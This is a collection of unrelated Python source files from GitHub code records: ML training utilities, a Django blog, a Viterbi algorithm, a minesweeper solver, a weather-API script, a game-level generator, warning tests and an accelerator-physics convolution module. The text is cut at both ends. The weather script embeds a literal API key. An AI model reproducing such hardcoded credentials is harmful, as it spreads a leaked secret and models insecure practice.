y_pred_test), axis=1), columns = header)\n train_result.to_csv(os.path.join(OUTPUT_DIR, job_dir, target + \"_\" + \"train_results.csv\"))\n test_result.to_csv(os.path.join(OUTPUT_DIR, job_dir, target + \"_\" + \"test_results.csv\"))\n\ndef register_job_log(job_dir, y_train, y_pred_train, y_test, y_pred_test):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(message)s\")\n file_handler = logging.FileHandler(os.path.join(OUTPUT_DIR, 'jobs_registry.log'))\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n train_MAPE = get_MAPE(y_train, y_pred_train)\n train_MAPE = str(round(train_MAPE, 2))\n test_MAPE = get_MAPE(y_test, y_pred_test)\n test_MAPE = str(round(test_MAPE, 2))\n log_msg = job_dir + \" :: \" + \"train_MAPE\" + \" :: \" + train_MAPE + \" :: \" + \"test_MAPE\" + \" :: \" + test_MAPE\n logger.info(log_msg)\n\ndef create_job_dir(job_dir):\n if not os.path.exists(os.path.join(OUTPUT_DIR, job_dir)):\n os.makedirs(os.path.join(OUTPUT_DIR, job_dir))\n\ndef save_training_file_info(train_filenames, job_dir):\n filename = os.path.join(OUTPUT_DIR, job_dir, 'training_files_info.json')\n with open(filename, 'w') as filehandler:\n json.dump({'training_files_used': train_filenames}, filehandler)","repo_name":"brianpinto91/atfm-delay-prediction","sub_path":"training/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74806545446","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Post, Comment\nfrom django.contrib import messages\nfrom .forms import PostForm, CommentForm\nfrom django.core.paginator import Paginator\n\n# Create your views here.\ndef home(request): #request holds what the user sent: the HTTP method plus string values, etc., passed along as a hash (dict)
\n post_list = Post.objects.all().order_by('-updated_at')\n paginator = Paginator(post_list, 10)\n\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n return render(request, 'blog/home.html', {'posts' : posts})\n\ndef detail(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n return render(request, 'blog/detail.html', {'post': post})\n\ndef new(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save()\n return redirect('detail', post.pk)\n else:\n form = PostForm()\n return render(request, 'blog/new.html', {'form': form})\n\ndef comment_new(request, pk):\n post = get_object_or_404(Post, pk=pk) #fetch the post so we know which post the comment belongs to\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n # post = get_object_or_404(Post)\n if form.is_valid():\n comment = form.save(commit = False)\n comment.post = post\n comment.save()\n return redirect('detail', post.pk) #pk here must be written as post.pk (the post variable)\n else:\n form = CommentForm()\n return render(request, 'blog/comment_new.html', {'form': form})\n\n","repo_name":"hayeon9826/django_crud","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8394730055","text":"from pathlib import Path\nfrom openpyxl import Workbook, load_workbook\nfrom openpyxl.worksheet.worksheet import Worksheet\n\nROOT_FOLDER = Path(__file__).parent\nWORKBOOK_PATH = ROOT_FOLDER / 'workbook.xlsx'\n\nworkbook: Workbook = load_workbook(WORKBOOK_PATH)\n\nsheet_name = 'Minha_Panilha'\n\nworksheet: Worksheet = workbook[sheet_name]\n\nfor row in worksheet.iter_rows():\n for cell in row:\n print(cell)\n \n# workbook.save(WORKBOOK_PATH)\n","repo_name":"Thiago-Teofilo/curso_python","sub_path":"python_curso_completo/m06_modules/aula334_openpyxl/reading.py","file_name":"reading.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27722713610","text":"'''\n@author: Armin\n'''\nimport numpy as np\n\nclass viterbi(object):\n \n####################### Constructor #####################\n\n def __init__(self, initialTable, transitionTable, emissionTable, deltaTable, psTable):\n self.initialTable = initialTable\n self.transitionTable = transitionTable \n self.emissionTable = emissionTable\n self.deltaTable = deltaTable\n self.psTable = psTable\n\n####################### Functions #######################\n def Initialization(self):\n for i in range(len(self.deltaTable[0])):\n self.deltaTable[0][i] = np.multiply(self.initialTable[i], self.emissionTable[i][1])\n \n def Deltas(self, obs):\n \n obsIndex = 1\n psIndex = 1\n v = []\n delta = 0\n\n for d in range(len(self.deltaTable)-1):\n d += 1\n for j in range(len(self.deltaTable[d])):\n for i in range(len(self.transitionTable)):\n v.append(self.deltaTable[d-1][i] * self.transitionTable[i][j])\n delta = max(v) * self.emissionTable[j][obs[obsIndex]]\n self.deltaTable[d][j] = delta\n self.psTable[psIndex][j] = max(v)\n delta = 0\n v = []\n obsIndex += 1\n psIndex += 1\n print(\"Delta Table\")\n print(self.deltaTable)\n print(\"Psi Table\")\n print(self.psTable)\n\n####################### Data Import #############################\n\n# States = {S, R, F}\n# Symbols = {U, N}\n\nInitialTable = np.loadtxt(\"Viterbi_Data/InitialTable.txt\", delimiter=',', dtype=np.float64)\n\nTransitionTable = 
np.loadtxt(\"Viterbi_Data/TransitionTable.txt\", delimiter=',', dtype=np.float64)\n\nEmissionTable = np.loadtxt(\"Viterbi_Data/EmissionTable.txt\", delimiter=',', dtype=np.float64)\n\n####################### Data #############################\n#This is the table where we keep deltas\ndeltaTable = np.zeros((3,3), dtype= np.float64)\n\n#Back Tracking\npsTable = np.zeros((3,3), dtype= np.float64)\n\n# Data = NUU\ndata = [1, 0, 0]\n\ntest = viterbi(InitialTable, TransitionTable, EmissionTable, deltaTable, psTable)\ntest.Initialization()\ntest.Deltas(data)\n","repo_name":"Armin-Smailzade/data-science-python","sub_path":"Forward and Viterbi Algorithm/viterbi.py","file_name":"viterbi.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73208844007","text":"\ndef minesweeper(minefield, n, m, field):\n\n keys = []\n for x in range(1, n+1):\n for i in range(1,m+1):\n if i in range(1,10):\n keys.append(x+float(\"0.0%r\" %(i)))\n else:\n keys.append(x+float(\"0.%r\" %(i)))\n\n vertes = []\n for i in range(0,n):\n line = minefield.pop(0)\n for a in line:\n vertes.append(a)\n\n dictas = dict(zip(keys, vertes))\n\n for key in dictas:\n bombos = []\n if float((\"%.2f\" % (key - 1.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 1.01)))])\n if float((\"%.2f\" % (key - 1.0))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 1.0)))])\n if float((\"%.2f\" % (key - 0.99))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 0.99)))])\n if float((\"%.2f\" % (key - 0.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 0.01)))])\n if float((\"%.2f\" % (key + 0.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 0.01)))])\n if float((\"%.2f\" % (key + 0.99))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 0.99)))])\n if float((\"%.2f\" % (key + 1.0))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 1.0)))])\n if float((\"%.2f\" % (key + 1.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 1.01)))])\n\n nr = 0\n for b in bombos:\n if b == '*':\n nr += 1\n\n if dictas[key] != \"*\":\n dictas[key] = nr\n\n output = []\n for key in sorted(dictas.keys()):\n output.append(dictas[key])\n\n print(\"\\nField #%r:\" % (field))\n\n for i,item in enumerate(output):\n if (i+1)%m == 0:\n print(item)\n else:\n print(item,end='')\n\n\ndef main():\n\n minefield = []\n with open('input3.txt') as inputfile:\n for line in inputfile:\n minefield.append(line.strip())\n\n\n field = 1\n while minefield:\n nm = minefield.pop(0)\n nm = nm.split()\n\n n = int(nm[0])\n m = int(nm[1])\n\n blokas = []\n for i in range(0,n):\n blokas.append(minefield.pop(0))\n\n if n != 0 and m != 0:\n minesweeper(blokas, n, m, field)\n\n field += 1\n\n\nmain()\n","repo_name":"00riddle00/BSc1-InformaticsBasics","sub_path":"python/3_minesweeper.py","file_name":"3_minesweeper.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27382799827","text":"import requests\r\nimport json\r\nfrom datetime import datetime\r\n\r\nAPI_key = 'b47d9ec1405359d146e41bd7c750adae'\r\ncity_name = 'Cherkessk'\r\ncountry = 'RU'\r\nlat = 44.2233\r\nlon = 42.0578\r\nexclude = 'minutely,hourly,alerts'\r\n\r\nURL = f'https://api.openweathermap.org/data/2.5/onecall?lat={lat}&lon={lon}&exclude={exclude}&appid={API_key}'\r\nr = requests.get(URL)\r\nweater = r.json()\r\ndaily = 
weater['daily']\r\n\r\n\r\ndef to_cels(temp):\r\n t = temp - 273.15\r\n return t\r\n\r\n\r\ndef get_temps(daily):\r\n dif_temps = []\r\n for i in daily:\r\n d_temp = abs(round(to_cels(i['temp'].get('morn')) - to_cels(i['temp'].get('night')), 2))\r\n dif_temps.append(d_temp)\r\n return dif_temps\r\n\r\n\r\ndef get_pressure(daily):\r\n pressures = []\r\n for i in range(5):\r\n pressures.append(daily[i].get('pressure'))\r\n return pressures\r\n\r\n\r\ndef get_day(daily, dif_temps):\r\n for i in daily:\r\n t = round(abs(i['temp'].get('morn') - i['temp'].get('night')), 2)\r\n if t == max(dif_temps):\r\n d = datetime.fromtimestamp(i.get('dt')).date()\r\n return d, t\r\n\r\n\r\ndif_temps = get_temps(daily)\r\nmax_pres = max(get_pressure(daily))\r\nprint('Maximum pressure over 5 days: ', max_pres)\r\nday, temp = get_day(daily, dif_temps)\r\nprint('Day with the maximum difference: ', day)\r\nprint('Temperature difference: ', temp)\r\n","repo_name":"Zick09/Parsing","sub_path":"parse(weater).py","file_name":"parse(weater).py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21656919693","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n:Purpose: Testing module for the ``pywarnings`` module.\n\n:Platform: Linux/Windows | Python 3.6+\n:Developer: J Berendt\n:Email: development@s3dev.uk\n\n:Comments: n/a\n\n\"\"\"\n# pylint: disable=invalid-name\n\nimport contextlib\nimport io\nimport warnings\ntry:\n from .base import TestBase\n from .testlibs import msgs\n from .testlibs.utilities import utilities\nexcept ImportError:\n from base import TestBase\n from testlibs import msgs\n from testlibs.utilities import utilities\n# The imports for utils4 must be after TestBase.\nfrom utils4.pywarnings import PyWarnings\n\n\nclass TestPyWarnings(TestBase):\n \"\"\"Testing class used to test the ``pywarnings`` module.\"\"\"\n\n _MSG1 = msgs.templates.not_as_expected.general\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Run this logic at the start of all test cases.\"\"\"\n msgs.startoftest.startoftest(module_name='pywarnings')\n\n def test01__ignore_warnings__single(self):\n \"\"\"Test the ``ignore_warnings`` method, for a single category.\n\n :Test:\n - Verify the FutureWarnings are allowed, ignored and re-allowed.\n\n \"\"\"\n buff = io.StringIO()\n pw = PyWarnings(ignore=True, categories=['FutureWarning'])\n with contextlib.redirect_stderr(buff):\n # Test 1\n warnings.warn('', FutureWarning)\n test1 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 2\n pw.ignore_warnings()\n warnings.warn('', FutureWarning)\n test2 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 3\n pw.reset_warnings()\n warnings.warn('', FutureWarning)\n test3 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n self.assertIn(member='FutureWarning', container=test1)\n utilities.assert_true(expected='', test=test2, msg=self._MSG1)\n self.assertIn(member='FutureWarning', container=test3)\n\n def test02__ignore_warnings__multiple(self):\n \"\"\"Test the ``ignore_warnings`` method, for multiple categories.\n\n :Test:\n - Verify the following warnings are allowed, ignored and\n re-allowed:\n\n - FutureWarning\n - ResourceWarning\n - UserWarning\n\n \"\"\"\n buff = io.StringIO()\n classes = [FutureWarning, ResourceWarning, UserWarning]\n strings = [c.__name__ for c in classes]\n pw = PyWarnings(ignore=True, categories=strings)\n with contextlib.redirect_stderr(buff):\n # Test 1\n for c, s in zip(classes, 
strings):\n warnings.warn('', c)\n test1 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 2\n pw.ignore_warnings()\n warnings.warn('', c)\n test2 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 3\n pw.reset_warnings()\n warnings.warn('', c)\n test3 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n self.assertIn(member=s, container=test1)\n utilities.assert_true(expected='', test=test2, msg=self._MSG1)\n self.assertIn(member=s, container=test3)\n\n def test03__ignore_warnings__config(self):\n \"\"\"Test the ``ignore_warnings`` method, using a dict.\n\n :Test:\n - Verify the FutureWarning is allowed, ignored and re-allowed.\n\n \"\"\"\n buff = io.StringIO()\n config = {'py_warnings': {'ignore': True, 'categories': 'FutureWarning'}}\n pw = PyWarnings(config=config)\n with contextlib.redirect_stderr(buff):\n # Test 1\n warnings.warn('', FutureWarning)\n test1 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 2\n pw.ignore_warnings()\n warnings.warn('', FutureWarning)\n test2 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 3\n pw.reset_warnings()\n warnings.warn('', FutureWarning)\n test3 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n self.assertIn(member='FutureWarning', container=test1)\n utilities.assert_true(expected='', test=test2, msg=self._MSG1)\n self.assertIn(member='FutureWarning', container=test3)\n","repo_name":"S3DEV/utils4","sub_path":"tests/test_pywarnings.py","file_name":"test_pywarnings.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12472409652","text":"def max(a,b,c):\n \"\"\"This function takes three numbers as input and outputs the\n largest of the three numbers \"\"\"\n if a>b and a>c:\n print(f\"{a} is maximum\")\n elif b>a and b>c:\n print(f\"{b} is maximum\")\n else:\n print(f\"{c} is maximum\")\n \nn1=int(input(\"Enter 1st number \"))\nn2=int(input(\"Enter 2nd number\"))\nn3=int(input(\"Enter 3rd number\"))\nmax(n1,n2,n3)\n","repo_name":"Access7-s/Python-Exercise","sub_path":"Python exercises Beginners/max_check.py","file_name":"max_check.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3434044562","text":"import sys\r\nimport os\r\ndef renameFilter(filterName):\r\n if filterName == 'VD':return 'VHS'\r\n if filterName == 'LED':return 'LED'\r\n if filterName == 'RAIN':return 'Rain'\r\n if filterName == 'BLI':return 'Blizzard'\r\n if filterName == 'PXS':return 'PixelSnow'\r\n if filterName == 'COM':return 'Compression'\r\n if filterName == 'PIX':return 'Pixelate'\r\n if filterName == 'WAV':return 'Waves'\r\n if filterName == 'STA':return 'Static'\r\n if filterName == 'GRA':return 'Grain'\r\n if filterName == 'MOT':return 'MotionBlur'\r\n if filterName == 'FIS':return 'Fisheye'\r\n if filterName == 'ABE':return 'Aberration'\r\n if filterName == 'DRA':return 'Drawing'\r\nfilename=input('type the name of the file> ')\r\nif '.adofai' in filename:pass\r\nelse:filename+='.adofai'\r\ntilenumber=input('tile number> ')\r\nstartoffset=input('starting angle> ')\r\nfinaloffset=input('final angle> ')\r\nstartvalue=input('start value> ')\r\nendvalue=input('end value> ')\r\ncount=input('count> ')\r\nfiltername=input('''filtername\r\nVHS LED Rain Blizzard Pixelsnow Compression Pixelate Waves Static Grain MotionBlur Fisheye Aberration Drawing\r\n> 
''')\r\nt1=float(startoffset)\r\nt2=float(finaloffset)\r\nx1=float(startvalue)\r\nx2=float(endvalue)\r\nn=int(count)\r\nf=open(filename,'rt',encoding='utf-8')\r\nFILE=[]\r\nwhile True:\r\n line=f.readline()\r\n if not line:break\r\n else:FILE.append(line)\r\nfor x in range(0,2):del FILE[len(FILE)-1]\r\nstrength=[]\r\nangle=[]\r\nfor i in range(n):\r\n strength.append(x1+(x2-x1)*i/(n-1))\r\n angle.append(t1+(t2-t1)*i/(n-1))\r\n\r\nFILE.append(f'\\t\\t{{ \"floor\": {tilenumber}, \"eventType\": \"SetFilter\", \"filter\": \"{filtername}\", \"enabled\": \"Enabled\", \"intensity\": {str(strength[0])}, \"disableOthers\": \"Disabled\", \"angleOffset\": {str(angle[0])}, \"eventTag\": \"\" }},\\n')\r\nfor i in range(1, n):\r\n FILE.append(f'\\t\\t{{ \"floor\": {tilenumber}, \"eventType\": \"SetFilter\", \"filter\": \"{filtername}\", \"enabled\": \"Enabled\", \"intensity\": {str(strength[i])}, \"disableOthers\": \"Disabled\", \"angleOffset\": {str(angle[i])}, \"eventTag\": \"\" }},\\n')\r\nFILE.append('\\t]\\n')\r\nFILE.append('}\\n')\r\ng=open('DONE.adofai', 'wt', encoding='utf-8')\r\ng.write(''.join(FILE))\r\ng.close()\r\nprint('Open DONE.adofai for final')\r\nos.system('pause')\r\n","repo_name":"junlovecat/ADOFAI_effect_generator","sub_path":"effect_generator.py","file_name":"effect_generator.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24957347836","text":"from selenium.webdriver import Firefox, FirefoxOptions\nfrom spider.logger import Logger\n\n\nclass Base(Logger):\n\n def __init__(self):\n Logger.__init__(self)\n self.logger.info(\"Starting Firefox..\")\n options = FirefoxOptions()\n options.add_argument(\"--headless\")\n try:\n self.browser = Firefox(options=options)\n self.logger.info(\"Firefox Ready..\")\n except Exception as e:\n self.logger.error(\"Firefox could not be started.\")\n self.logger.error(e)\n quit(-1)\n\n def quit(self):\n if self.browser:\n self.logger.info(\"Quitting Firefox..\")\n self.browser.quit()\n","repo_name":"sharathg/stock_checker","sub_path":"spider/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36490679844","text":"from math import sin, cos, radians\n\ndef move_wp(dir, distance, pos):\n (x, y) = pos\n if dir == 'N':\n y += distance\n elif dir == 'S':\n y -= distance\n elif dir == 'E':\n x += distance\n elif dir == 'W':\n x -= distance\n\n return (x, y)\n\ndef rotate_wp(turn_dir, deg, waypoint):\n deg = deg * -1 if turn_dir == 'R' else deg\n rad = radians(deg)\n\n (x,y) = waypoint\n \n # vector rotation\n rx = round(x*cos(rad) - y*sin(rad))\n ry = round(x*sin(rad) + y*cos(rad))\n\n return (rx, ry)\n\ndef move(pos, waypoint, distance):\n (x, y) = pos\n (wx, wy) = waypoint\n\n return (x + distance * wx, y + distance * wy)\n\nwith open('input.txt', 'r') as file:\n nav_instructions = [r for r in file.read().split('\\n')]\n\n pos = (0,0)\n waypoint = (10, 1)\n\n for inst in nav_instructions:\n action = inst[:1]\n distance = int(inst[1:])\n \n if action == 'F':\n pos = move(pos, waypoint, distance)\n elif action in 'LR':\n waypoint = rotate_wp(action, distance, waypoint)\n else:\n waypoint = move_wp(action, distance, waypoint)\n\n manhattan_dist = abs(pos[0])+abs(pos[1])\n 
print(manhattan_dist)","repo_name":"finafisken/adventofcode2020","sub_path":"day12/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19402446834","text":"__author__ = 'Sergey Tomin'\n\nfrom numpy import sqrt, reshape, shape, pi, exp, zeros, array, meshgrid\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom ocelot.lib.genera.src.python.convolution.convolution_gauss import convolution_1D_cpp, convolution_2D_cpp\n\n\ndef plot3D_data(data, x, y):\n X,Y = meshgrid(x,y)\n fig = plt.figure()\n ax = Axes3D(fig)\n #ax = fig.add_subplot(111, projection = \"3d\")\n ax.plot_surface(X, Y, data, rstride=1, cstride=1, cmap=cm.jet)\n\n#def conditions_emitt_spread(screen):\n# if screen.ne ==1 and (screen.nx and screen.ny):\n# effect = 1\n# elif screen.ne ==1 and (screen.nx==1 and screen.ny):\n# effect = 2\n# elif screen.ne ==1 and (screen.nx and screen.ny == 1):\n# effect = 3\n# elif screen.ne >1 and (screen.nx == 1 and screen.ny == 1):\n# effect = 4\n# else:\n# effect = 0\n# return effect\n\ndef beam_sizes_on_screen(beam, screen):\n if beam.emit_x == 0 or beam.emit_y == 0:\n print (\"Emittance switched off. One of emittances is zero\")\n return False\n beam.sizes()\n screen.beam_size_x = sqrt(beam.sigma_x*beam.sigma_x*1e6 + (beam.sigma_xp*screen.Distance)**2) # mm\n screen.beam_size_y = sqrt(beam.sigma_y*beam.sigma_y*1e6 + (beam.sigma_yp*screen.Distance)**2) # mm\n\n if screen.beam_size_x == 0:\n print (\"Emittance switched off. Hor. e-beam size projection on screen is zero\")\n return False\n\n if screen.beam_size_y == 0:\n print (\"Emittance switched off. Ver. e-beam size projection on screen is zero\")\n return False\n print (\"Hor. e-beam size projection on screen: \", screen.beam_size_x, \" mm\")\n print (\"Ver. e-beam size projection on screen: \", screen.beam_size_y, \" mm\")\n\n #if beam.beta_x and beam.beta_y:\n #\n # beam.sizes()\n # #print beam.sigma_x, beam.sigma_xp\n # #print beam.sigma_y, beam.sigma_yp\n # #print \"Distance = \", screen.Distance, \" mm\"\n # screen.beam_size_x = sqrt(beam.sigma_x*beam.sigma_x*1e6 + (beam.sigma_xp*screen.Distance)**2)\n # screen.beam_size_y = sqrt(beam.sigma_y*beam.sigma_y*1e6 + (beam.sigma_yp*screen.Distance)**2)\n # print \"Hor. e-beam size projection on screen: \", screen.beam_size_x, \" mm\"\n # print \"Ver. 
e-beam size projection on screen: \", screen.beam_size_y, \" mm\"\n # return True\n #\n #elif not beam.beta_x or not beam.beta_y:\n #\n # print \"Emittance switched off: one of the beta functions is zero \"\n # return False\n #\n #else:\n # print \"Emittance switched off: beam dimensions are zero size \"\n return True\n\ndef change_size(n, step, start, half_size, acc = 3):\n n_add = 0\n accuracy = acc\n if half_size != 0:\n if step == 0:\n n_add = 3*accuracy\n n = 2*n_add + 1\n start -= half_size\n step = half_size/n_add\n else:\n n_add = (int(half_size/step)+1)\n n += 2*n_add\n start -= n_add*step\n return n,step,start, n_add\n\ndef change_sizes_screen(screen, beam):\n # all sizes in mm and mrad!!!\n\n ## energy spread is not correct\n # screen.fund_harm_eV -> screen.start_energy\n screen.sigma_e = 2.*beam.sigma_E/beam.E*screen.start_energy\n #print \"sigma_e = \", screen.sigma_e\n screen.nx_add = 0\n screen.ny_add = 0\n screen.ne_add = 0\n\n if beam_sizes_on_screen(beam, screen):\n\n if screen.ne == 1:\n screen.nx, screen.x_step, screen.x_start, screen.nx_add = change_size(screen.nx, screen.x_step, screen.x_start, screen.beam_size_x*1.) # emittance X\n screen.ny, screen.y_step, screen.y_start, screen.ny_add = change_size(screen.ny, screen.y_step, screen.y_start, screen.beam_size_y*1.) # emittance Y\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n\n elif screen.nx ==1 and screen.ny ==1:\n if screen.theta_x !=0 and screen.theta_y != 0:\n screen.nx, screen.x_step, screen.x_start, screen.nx_add = change_size(screen.nx, screen.x_step, screen.x_start, screen.theta_x*screen.Distance) # emittance X\n screen.ny, screen.y_step, screen.y_start, screen.ny_add = change_size(screen.ny, screen.y_step, screen.y_start, screen.theta_y*screen.Distance) # emittance Y\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n else:\n screen.nx, screen.x_step, screen.x_start, screen.nx_add = change_size(screen.nx, screen.x_step, screen.x_start, screen.beam_size_x) # emittance X\n screen.ny, screen.y_step, screen.y_start, screen.ny_add = change_size(screen.ny, screen.y_step, screen.y_start, screen.beam_size_y) # emittance Y\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n else:\n print (\"Emittance switched off. Screen sizes are wrong. ne >1 and (nx or ny) >1\")\n\n elif screen.nx ==1 and screen.ny ==1:\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n elif screen.ne == 1:\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n else:\n print (\"1_ Emittance switched off. Screen sizes are wrong. 
ne >1 and (nx or ny) >1\")\n\n\n\ndef emittance_on(screen):\n Pi = [] #zeros((screen.ny - 2*screen.ny_add, screen.nx - 2*screen.nx_add))\n Sigma = []# zeros((screen.ny - 2*screen.ny_add, screen.nx - 2*screen.nx_add))\n\n #print \"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\"\n nx_ny = screen.nx*screen.ny\n #print nx_ny, shape(screen.Pi), shape(screen.Sigma), screen.beam_size_x ,screen.beam_size_y, screen.ne\n for ie in range(screen.ne):\n #print ie\n data_pi = screen.Pi[nx_ny*ie : nx_ny*(ie+1)]\n data_sigma = screen.Sigma[nx_ny*ie : nx_ny*(ie+1)]\n #print shape(data_pi), shape(data_sigma)\n data_pi = convolution_2D_cpp(data_pi,screen.Xph,screen.Yph,screen.nx_add, screen.ny_add, screen.beam_size_x ,screen.beam_size_y )\n data_sigma = convolution_2D_cpp(data_sigma,screen.Xph,screen.Yph, screen.nx_add, screen.ny_add, screen.beam_size_x ,screen.beam_size_y )\n\n #mean_pi = sum(data_pi)/len(data_pi)\n #data_pi[:] = mean_pi\n #mean_sigma = sum(data_sigma)/len(data_sigma)\n #data_sigma[:] = mean_sigma\n\n data_pi = reshape(data_pi, (screen.ny , screen.nx ))\n data_sigma = reshape(data_sigma, (screen.ny , screen.nx ))\n #print shape(data_sigma)\n data_pi = data_pi[screen.ny_add : -screen.ny_add, screen.nx_add : -screen.nx_add]\n data_sigma = data_sigma[screen.ny_add : -screen.ny_add, screen.nx_add : -screen.nx_add]\n Pi.append(data_pi)\n Sigma.append(data_sigma)\n\n screen.Xph = screen.Xph[screen.nx_add : screen.nx-screen.nx_add]\n screen.Yph = screen.Yph[screen.ny_add : screen.ny-screen.ny_add]\n screen.x_start += screen.nx_add*screen.x_step\n screen.y_start += screen.ny_add*screen.y_step\n screen.nx -= 2*screen.nx_add\n screen.ny -= 2*screen.ny_add\n return Pi, Sigma\n\ndef spread_on(screen, Pi,Sigma):\n sigma_e = screen.sigma_e\n ## energy spread is not correct\n # screen.fund_harm_eV -> screen.start_energy\n k = lambda energy: exp(-(energy - screen.start_energy)**2/(2.*sigma_e*sigma_e))/(sqrt(2.*pi)*sigma_e)\n\n if screen.ne - 2*screen.ne_add == 1:\n\n e_pi = zeros(shape(Pi[0]))\n e_sigma = zeros(shape(Pi[0]))\n\n d_e = screen.Eph[1] - screen.Eph[0]\n for ie in range(screen.ne):\n\n eph = screen.Eph[ie]\n #print ie, k(eph), eph\n #print array(Pi[ie])\n #print array(e_pi)\n e_pi += array(Pi[ie])*k(eph)*d_e\n e_sigma += array(Sigma[ie])*k(eph)*d_e\n #print Sigma[ie]\n #plt.plot(range(len(Sigma[ie])), Sigma[ie])\n #plt.show()\n screen.Pi = reshape(e_pi, screen.nx*screen.ny)\n #plot3D_data(e_pi, screen.Xph, screen.Yph)\n\n screen.Sigma = reshape(e_sigma, screen.nx*screen.ny)\n #plot3D_data(e_sigma, screen.Xph, screen.Yph)\n\n screen.Total = screen.Sigma + screen.Pi\n #plot3D_data(screen.Total, screen.Xph, screen.Yph)\n #plt.show()\n #!!!!!!\n screen.Eph = screen.Eph[screen.ne_add : screen.ne - screen.ne_add]\n screen.ne -= 2*screen.ne_add\n else:\n #print shape(Pi), shape(reshape(Pi,shape(Pi)[0]))\n Pi = reshape(Pi,shape(Pi)[0])\n Pi = convolution_1D_cpp(Pi,screen.Eph, screen.ne_add, screen.sigma_e)\n screen.Pi = Pi[screen.ne_add : screen.ne - screen.ne_add]\n #print \"%%%% = \",shape(Pi)\n Sigma = reshape(Sigma,shape(Sigma)[0])\n Sigma = convolution_1D_cpp(Sigma,screen.Eph, screen.ne_add, screen.sigma_e)\n screen.Sigma = Sigma[screen.ne_add : screen.ne - screen.ne_add]\n screen.Total = screen.Sigma + screen.Pi\n\n\n #print \"$$$ Total= \", screen.ne, shape(screen.Total)\n screen.Eph = screen.Eph[screen.ne_add : screen.ne - screen.ne_add]\n screen.ne -= 2*screen.ne_add\n\n\ndef convolution_all(screen):\n #ypoint*xpoint*je + xpoint*jy + jx\n if not screen.nx_add and not screen.ny_add and not screen.ne_add:\n 
